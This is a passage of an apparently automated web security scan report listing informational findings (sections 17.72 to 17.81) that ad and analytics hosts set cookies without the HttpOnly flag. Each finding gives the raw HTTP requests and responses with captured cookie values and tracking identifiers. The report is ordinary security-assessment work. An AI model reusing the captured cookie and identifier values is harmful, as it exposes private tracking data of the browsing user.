Cookie: Apache="168362049x0.049+1303083450x544669068"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; srh="1%3Aq64FAA%3D%3D"; b="%3A%3A12ggb%2C6e73"; fq="7l04r%2C1uo0%7Clkjpsr%2C84fok%2C1uo0%7Clkigxp%2C83ol2%2C1uo0%7Clkjpss%2C826ke%2C1uo0%7Clkjpsr"; rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBiI_srNEyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2CjAKBjc2MjcwMRiN1OvNEyIgOTc4OTcyREZBMDYzMDAwRDJDMEU3QTM4MEJGQTFERUMKNAoGODA2MjA1GMDJhpkVIiQwYzJhZWRlNi02YmI2LTExZTAtOGZlNi0wMDI1OTAwYThmZmUQAQ; ut="1%3AHc7LDoMgEIXhd5k1CwarJb4NqBXTKRTwEnV892K3f76TnBNWBe0J72HfQuoztNA5p8cozcoYaZw%2FrNiKrHJCxu%2F%2B8p4NI86HiLE6toJ0laggrEU2qjf3zOnMyJJxCVJkGohKtfMW%2BMmNrUTnqJn25uFL7uVCNwYB1ng%2FpOl%2FA67rBw%3D%3D"; vsd=0@3@4dbe115e@websiteprice.net; rb=0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:742697:20828160:2931142961646634775:0:762701:20861280:978972DFA063000D2C0E7A380BFA1DEC:0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Content-Type: application/x-javascript
Set-Cookie: b="%3A%3A12gg8%2C12ggb%2C6e73"; path=/; domain=.adbrite.com; expires=Tue, 01-May-2012 02:22:25 GMT
Set-Cookie: rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBiI_srNEyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2CjYKBjc2MjcwMRCd87L6CRi9rqrOEyIgOTc4OTcyREZBMDYzMDAwRDJDMEU3QTM4MEJGQTFERUMKFAoGNzgyNjA2EL3WyKMKGL2uqs4TCjQKBjgwNjIwNRjAyYaZFSIkMGMyYWVkZTYtNmJiNi0xMWUwLThmZTYtMDAyNTkwMGE4ZmZlEAE; path=/; domain=.adbrite.com; expires=Sun, 31-Jul-2011 02:22:25 GMT
Set-Cookie: ut="1%3AHY5LEoMgEAXvMmsWDEZDeRtQI1YmEMBPqePdg9l29et6J6wK2hPew76F1GdooXNOj1GalTHSOH9YsRXZqN7cwOnMyJJxCVLEWB1bobpKVDSsRVY5IeN3f3nPZYDzITINRMWy8xb4yY2tROeomfbm4Qvu5UJ3EgRY4%2F2Qpv8NuK4f"; path=/; domain=.adbrite.com; expires=Thu, 29-Apr-2021 02:22:25 GMT
Set-Cookie: vsd=0@4@4dbe1561@websiteprice.net; path=/; domain=.adbrite.com; expires=Wed, 04-May-2011 02:22:25 GMT
Set-Cookie: fq="7l04r%2C1uo0%7Clkjpsr%2C84fok%2C1uo0%7Clkigxp%2C83ol2%2C1uo0%7Clkjpss%2C84y2m%2C1uo0%7Clkjqld%2C826ke%2C1uo0%7Clkjpsr"; path=/; domain=.adbrite.com; expires=Tue, 01-May-2012 02:22:25 GMT
Set-Cookie: rb=0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:742697:20828160:2931142961646634775:0:762701:20861280:978972DFA063000D2C0E7A380BFA1DEC:0:782606:20861280::0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0; path=/; domain=.adbrite.com; expires=Sun, 31-Jul-2011 02:22:25 GMT
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Mon, 02 May 2011 02:22:25 GMT
Content-Length: 3164

var AdBrite_Title_Color_Default = '0000FF';
var AdBrite_Text_Color_Default = '000000';
var AdBrite_Background_Color_Default = 'fcfaf3';
var AdBrite_Border_Color_Default = 'fcfaf3';
var AdBrite_URL_Col
...[SNIP]...

17.72. http://ads2.adbrite.com/v0/ad

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads2.adbrite.com
Path:   /v0/ad

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /v0/ad?sid=1794251&br=1&ifr=1&ref=http%3A%2F%2Fwebsiteprice.net%2Fresult%2F%3Fid%3D65934&zx=520&zy=233&ww=1041&wh=903&fl=1 HTTP/1.1
Host: ads2.adbrite.com
Proxy-Connection: keep-alive
Referer: http://websiteprice.net/result/?id=65934
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; rb=0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:742697:20828160:2931142961646634775:0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3A6e73"; fq="84fok%2C1uo0%7Clkigxp"; srh="1%3Aq64FAA%3D%3D"; rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBiI_srNEyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2CjQKBjgwNjIwNRjAyYaZFSIkMGMyYWVkZTYtNmJiNi0xMWUwLThmZTYtMDAyNTkwMGE4ZmZlEAE; ut="1%3AHc3LDoMgEIXhd5k1CwZaanwbUCqmFMulEnR895Juv%2F8k54RdwHjCy7a6pTnDCJNzwxK53gmjX8qbBBkWozxqh0Em3wHvLIuckPDTniGQJsRysOyt931lSt3oQcpINjmv1qZuofPMv70SBwZGh2DT%2Bj%2BE6%2FoB"

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Content-Type: application/x-javascript
Set-Cookie: b="%3A%3A12ggb%2C6e73"; path=/; domain=.adbrite.com; expires=Tue, 01-May-2012 02:19:49 GMT
Set-Cookie: ut="1%3AHY1LDoMgFADv8tYseNBS421AqZhSLJ9K0OfdS7qdmWRO2AWMJ7xsq1uaM4wwOTcskeudMPqlvEmQYVnkhISf9gyBNCGWg8Uoj9qjQSbfI7yz7K33nZhSN3qQMpJNzqu1qVvoeObfbokDA6NDsGn9D%2BG6fg%3D%3D"; path=/; domain=.adbrite.com; expires=Thu, 29-Apr-2021 02:19:49 GMT
Set-Cookie: vsd=0@1@4dbe14c5@websiteprice.net; path=/; domain=.adbrite.com; expires=Wed, 04-May-2011 02:19:49 GMT
Set-Cookie: fq="84fok%2C1uo0%7Clkigxp%2C83ol2%2C1uo0%7Clkjqh1%2C826ke%2C1uo0%7Clkjqh1"; path=/; domain=.adbrite.com; expires=Tue, 01-May-2012 02:19:49 GMT
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Mon, 02 May 2011 02:19:49 GMT
Content-Length: 4307

document.write('<a class=\"adHeadline\" target=\"_top\" onmouseover=\"window.status=\'http://www.cheapezfast.com\'; return true;\" onmouseout=\"window.status=\' \'; return true;\" href=\"http://click.
...[SNIP]...

17.73. http://b.scorecardresearch.com/b

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=2&c2=3005617&rn=709336356&c7=http%3A%2F%2Fwww.washingtonpost.com%2Fwl%2Fjobs%2Fhome%3Fwpsrc%3DAG0002174%26keyword%3D4846831919%26cre%3D430450907%26g%3D1%26s_kwcid%3DTC-21380-4846831919-e-430450907&c8=Washington%20DC%20Area%20Jobs%20%26%20Careers%3A%20Find%20Your%2&cv=2.2&cs=js HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wl/jobs/home?wpsrc=AG0002174&keyword=4846831919&cre=430450907&g=1&s_kwcid=TC-21380-4846831919-e-430450907
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Sun, 01 May 2011 23:34:41 GMT
Connection: close
Set-Cookie: UID=25894b9d-24.143.206.177-1303083414; expires=Tue, 30-Apr-2013 23:34:41 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


17.74. http://bdv.bidvertiser.com/bidvertiser.dbm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bdv.bidvertiser.com
Path:   /bidvertiser.dbm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bidvertiser.dbm?pid=349166&bid=862453&RD=89&DIF=2&bd_ref_v=&tref=1&win_name=null&docref=&jsrand=24578&js1loc=about%3Ablank HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: bdv.bidvertiser.com

Response

HTTP/1.1 200 OK
Date: Monday, 02-May-2011 02:34:42 GMT
Cache-Control: no-store
Last-Modified: Sunday, 02-May-2010 02:34:42 GMT
Set-Cookie: bdv_c5p=214590_41999682_1; domain=.bidvertiser.com; path=/; expires=Tue, 03-May-2011 02:34:42 GMT
Set-Cookie: fre5_krp=214590_41999682_1; domain=.bidvertiser.com; path=/; expires=Mon, 09-May-2011 02:34:42 GMT
P3P: policyref="http://www.bidvertiser.com/bdv/bidvertiser/p3p.xml", CP="NOI DEV PSA PSD IVA OTP OUR OTR IND OTC"
Content-Type: text/html; charset=ISO-8859-1
Content-Len: 384
Warning: 214 "Juniper Networks DX Active"
Vary: Accept-Encoding, User-Agent
Content-Length: 384

var PUC="http://www.hyperpromote.com/tags/showaon.html?bvgeocode=US&bvlocationcode=862453&bvurl=" + encodeURI(document.location) + "&bvtitle=" + escape(document.title);
var bv_freq=21600;
var temp_s
...[SNIP]...

17.75. http://bh.contextweb.com/bh/rtset

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /bh/rtset

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bh/rtset?do=add&pid=530741&ev=c1e1301e-3a1f-4ca7-9870-f636b5f10e66&cb=3w3v1p&rurl=http%3A%2F%2Fa.triggit.com%2Fpxcwcm HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|535461.2931142961646634775.1; C2W4=3bZ_cGKSaikCutesUynzUXb59QbtOHa7Nv35a38qe_dW_2SdvoXWHsQ; pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|530741.c1e1301e-3a1f-4ca7-9870-f636b5f10e66.0|535461.2931142961646634775.1; V=wOebwAz4UvVv; cwbh1=541%3B05%2F24%2F2011%3BLIFL1%0A1697%3B05%2F24%2F2011%3BFCRT1%0A2354%3B05%2F24%2F2011%3BZETC1%0A2532%3B05%2F26%2F2011%3BAMQU2%0A1443%3B05%2F30%2F2011%3BNETM7

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun GlassFish Enterprise Server v2.1
CW-Server: cw-web82
Cache-Control: no-cache, no-store
Set-Cookie: V=wOebwAz4UvVv; Domain=.contextweb.com; Expires=Thu, 26-Apr-2012 02:01:51 GMT; Path=/
Set-Cookie: pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|530741.c1e1301e-3a1f-4ca7-9870-f636b5f10e66.0|535461.2931142961646634775.1; Domain=.contextweb.com; Expires=Tue, 01-May-2012 02:01:51 GMT; Path=/
Location: http://a.triggit.com/pxcwcm
Content-Type: text/html; charset=iso-8859-1
Content-Length: 0
Date: Mon, 02 May 2011 02:01:50 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"


17.76. http://bing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bing.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: bing.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110423; _UR=; s_nr=1303567291710; SRCHD=MS=1744674&SM=1&D=1740336&AF=NOFORM; MUID=B506C07761D7465D924574124E3C14DF; s_vnum=1306159291712%26vn%3D2; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; countrycode=US; zipcode=75207

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private
Content-Length: 0
Location: http://www.bing.com/
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Edge-control: no-store
Set-Cookie: _HOP=I=1&TS=1304292748; domain=bing.com; path=/
Date: Sun, 01 May 2011 23:32:28 GMT


17.77. http://bs.serving-sys.com/BurstingPipe/adServer.bs

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2193540&PluID=0&w=160&h=600&64cd0da313&ncu=http://d1.openx.org/ck.php?oaparams=2__bannerid=522976__zoneid=0__OXLCA=1__cb=64cd0da313__r_id=85dbdb9e09296233a4d7b328928878f8__r_ts=lkjpfk__oadest=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBIsVPfQ--TffUN9q86QaO0KkvyMnAgAKQ3aCnJriw6u9EABABGAEgADgBUIDH4cQEYMnug4jwo-wSggEXY2EtcHViLTcyNTExNzM2MDIxMjU3NzWgAeDq_toDsgERd3d3LmphcGFuYXRvci5jb226AQoxNjB4NjAwX2FzyAEJ2gEtaHR0cDovL3d3dy5qYXBhbmF0b3IuY29tL2VsZXBoYW50L2xvZ2luLnBodG1smAKOAsACBMgCgOr2FqgDAegDvQL1AwAAAOQ%26num%3D1%26sig%3DAGiWqtwQa1xoRafBymiCbfwPHRB1hm9EPA%26client%3Dca-pub-7251173602125775%26adurl%3D%3Bcb%3D1442324580http%253A%252F%252Fwww.zipcar.com%252Fwebchi3col75&ucm=true&ncu=$$%c$$ HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://d1.openx.org/afr.php?resize=1&campaignid=246606&what=chi160x600&ct0=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBIsVPfQ--TffUN9q86QaO0KkvyMnAgAKQ3aCnJriw6u9EABABGAEgADgBUIDH4cQEYMnug4jwo-wSggEXY2EtcHViLTcyNTExNzM2MDIxMjU3NzWgAeDq_toDsgERd3d3LmphcGFuYXRvci5jb226AQoxNjB4NjAwX2FzyAEJ2gEtaHR0cDovL3d3dy5qYXBhbmF0b3IuY29tL2VsZXBoYW50L2xvZ2luLnBodG1smAKOAsACBMgCgOr2FqgDAegDvQL1AwAAAOQ%26num%3D1%26sig%3DAGiWqtwQa1xoRafBymiCbfwPHRB1hm9EPA%26client%3Dca-pub-7251173602125775%26adurl%3D;cb=1442324580&
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C4=; u2=8023169f-8dce-4de3-84d7-d5a4468633313HG09g; ebNewBandWidth_.bs.serving-sys.com=131%3A1303947429371; A3=iQQIaFx503Dk00000iKhqaHW208A300001jj9MaH17066N00001iZLfaFB607pd00001j0InaHlY09sO00001j4HbaE.a0a9y00001jGDhaHW50d8900000jcM0aFSa04m400000eDVwaDPh084o00001gY2paFS+09nl00003jGDjaHWf0d8900000hH4jaFhv09wy00001jcL+aFTt04m400000hEI2aE.a09B400001jmnFaEUX09SF00002jGaZaHWf0d8900004johvaFxN07uh00002h52YaGZy0ca700001hUDyaFGt0cbS00001i54CaFsN09MT00000eDVtaDP.084o00001jeoLaF6J07Hs00001j2fVaFWe07aw00001jFY.aHqe0d8900001j2VdaGyd07aw00001j8QYaEBz07LU00001igT+aFh30cXt00001hUBuaFGt0cbS00001jv+zaH1o0d8900002jFZhaHWf0d8900000jAtnaHq602WG00001iBU1aEBz0aVU000019rW0aFGt04uw00001; B3=9yE10000000000up7.Wt0000000001ui9cTR0000000001uf8Dka0000000001uh85Yh0000000001un9abz0000000000ui52BU0000000001ui9fJa0000000001ul8TfJ0000000001uh9eB50000000001uj9yMi0000000000up8Wi10000000001un93M20000000001uf82Np0000000001um9ufH0000000002um99ex0000000001um9yMk0000000000up9kkO0000000000uj8OuK0000000000ui9kkN0000000000uj78Oj0000000001ud8Zxy0000000001up9qqo0000000002ui9yDd0000000001un78O70000000001ud9gdG0000000001uh8z+.0000000001uh9pRI0000000002ug9iae0000000001uh9xwn0000000004up7.Ws0000000001ui99y10000000001ui80Dr0000000003uj; eyeblaster=BWVal=737&BWDate=40663.344456&debuglevel=&FLV=10.2154&RES=128&WMPV=0; TargetingInfo=0007g420000%5f

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: A3=iQQIaFx503Dk00000j0InaHlY09sO00001iZLfaFB607pd00001jj9MaH17066N00001iKhqaHW208A300001jGDhaHW50d8900000j4HbaE.a0a9y00001eDVwaDPh084o00001jcM0aFSa04m400000jGDjaHWf0d8900000gY2paFS+09nl00003hH4jaFhv09wy00001hEIkaItM0bI400001jmnFaEUX09SF00002hEI2aE.a09B400001jcL+aFTt04m400000jGaZaHWf0d8900004h52YaGZy0ca700001johvaFxN07uh00002i54CaFsN09MT00000hUDyaFGt0cbS00001eDVtaDP.084o00001j2fVaFWe07aw00001jeoLaF6J07Hs00001jFY.aHqe0d8900001j8QYaEBz07LU00001j2VdaGyd07aw00001jv+zaH1o0d8900002hUBuaFGt0cbS00001igT+aFh30cXt000019rW0aFGt04uw00001iBU1aEBz0aVU00001jAtnaHq602WG00001jFZhaHWf0d8900000; expires=Sat, 30-Jul-2011 22:08:15 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=7.Wt0000000001ui9yE10000000000up8Dka0000000001uh9cTR0000000001uf85Yh0000000001un52BU0000000001ui9abz0000000000ui9yMi0000000000up9eB50000000001uj8TfJ0000000001uh9fJa0000000001ul8ny40000000001uq9ufH0000000002um82Np0000000001um93M20000000001uf8Wi10000000001un9yMk0000000000up99ex0000000001um9kkO0000000000uj8OuK0000000000ui9kkN0000000000uj78Oj0000000001ud9yDd0000000001un9qqo0000000002ui8Zxy0000000001up9gdG0000000001uh78O70000000001ud9pRI0000000002ug8z+.0000000001uh9iae0000000001uh80Dr0000000003uj99y10000000001ui7.Ws0000000001ui9xwn0000000004up; expires=Sat, 30-Jul-2011 22:08:15 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Mon, 02 May 2011 02:08:15 GMT
Connection: close
Content-Length: 1831

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...

17.78. http://c.bing.com/c.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c.bing.com
Path:   /c.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /c.gif?DI=15074 HTTP/1.1
Host: c.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110423; _UR=; s_nr=1303567291710; s_vnum=1306159291712%26vn%3D2; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; countrycode=US; zipcode=75207; _HOP=; MUID=B506C07761D7465D924574124E3C14DF; OrigMUID=B506C07761D7465D924574124E3C14DF%2c2d5571d309564964970af86c3c5fef46; _SS=SID=54196B2489E649DC9D985351F7EDDDA0&CW=983&CH=903; SRCHD=MS=1752452&SM=1&D=1740336&AF=NOFORM

Response

HTTP/1.1 302 Redirect
Cache-Control: private, no-cache, proxy-revalidate
Pragma: no-cache
Location: http://c.atdmt.com/c.gif?DI=15074&RedC=c.bing.com&MXFR=B506C07761D7465D924574124E3C14DF
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Set-Cookie: MUID=B506C07761D7465D924574124E3C14DF&TUID=1; domain=.bing.com; expires=Thu, 17-Nov-2011 23:32:33 GMT; path=/;
Date: Sun, 01 May 2011 23:32:32 GMT
Content-Length: 0


17.79. http://c.statcounter.com/t.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c.statcounter.com
Path:   /t.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /t.php?sc_project=6811643&resolution=1920&h=1200&camefrom=&u=http%3A//bizinformation.co/www.onlinemicrofiche.com&t=www.Onlinemicrofiche.com&java=1&security=0e4e73f2&sc_random=0.7098396345973015&sc_snum=1&invisible=1 HTTP/1.1
Host: c.statcounter.com
Proxy-Connection: keep-alive
Referer: http://bizinformation.co/www.onlinemicrofiche.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: is_unique_1=sc6761715.1303907356.0; is_unique=sc2226915.1303083753.0-1656416.1303217091.0-6426596.1303907356.0

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:12:24 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.10
P3P: policyref="http://www.statcounter.com/w3c/p3p.xml", CP="ADMa OUR COM NAV NID DSP NOI COR"
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Set-Cookie: is_unique=sc2226915.1303083753.0-1656416.1303217091.0-6426596.1303907356.0-6811643.1304302344.0; expires=Sat, 30-Apr-2016 02:12:24 GMT; path=/; domain=.statcounter.com
Content-Length: 49
Connection: close
Content-Type: image/gif

GIF89a...................!.......,...........T..;

17.80. http://clk.atdmt.com/CNT/go/319741851/direct/01/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clk.atdmt.com
Path:   /CNT/go/319741851/direct/01/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /CNT/go/319741851/direct/01/ HTTP/1.1
Host: clk.atdmt.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1303072666-9018543; ach00=903d/120af:fb75/120af:e2ff/25d1; ach01=2a0cb15/120af/57ac7cf/903d/4db39163:b9e90a8/120af/f1fa4b0/fb75/4db416f0:c46edc2/25d1/128fabed/e2ff/4db8a484; MUID=B506C07761D7465D924574124E3C14DF

Response

HTTP/1.1 302 Object moved
Cache-Control: no-store
Content-Length: 0
Expires: 0
Location: http://www.business.att.com/enterprise/Family/network-security/threat-vulnerability-management/?GUID=F7BA3C75-6B83-4966-96A6-0F35574C4352&WT.srch=1
X-Powered-By: ASP.NET
P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC"
Set-Cookie: ach00=903d/120af:fb75/120af:e2ff/25d1:d2ca/12b1e; expires=Tuesday, 30-Apr-2013 00:00:00 GMT; path=/; domain=.atdmt.com
Set-Cookie: ach01=2a0cb15/120af/57ac7cf/903d/4db39163:b9e90a8/120af/f1fa4b0/fb75/4db416f0:c46edc2/25d1/128fabed/e2ff/4db8a484:cbb7115/12b1e/130edf9b/d2ca/4dbdeda3; expires=Tuesday, 30-Apr-2013 00:00:00 GMT; path=/; domain=.atdmt.com
Date: Sun, 01 May 2011 23:32:51 GMT
Connection: close


17.81. http://csc.beap.ad.yieldmanager.net/i

Summary

Severity:   Information
Confidence:   Certain
Host:   http://csc.beap.ad.yieldmanager.net
Path:   /i

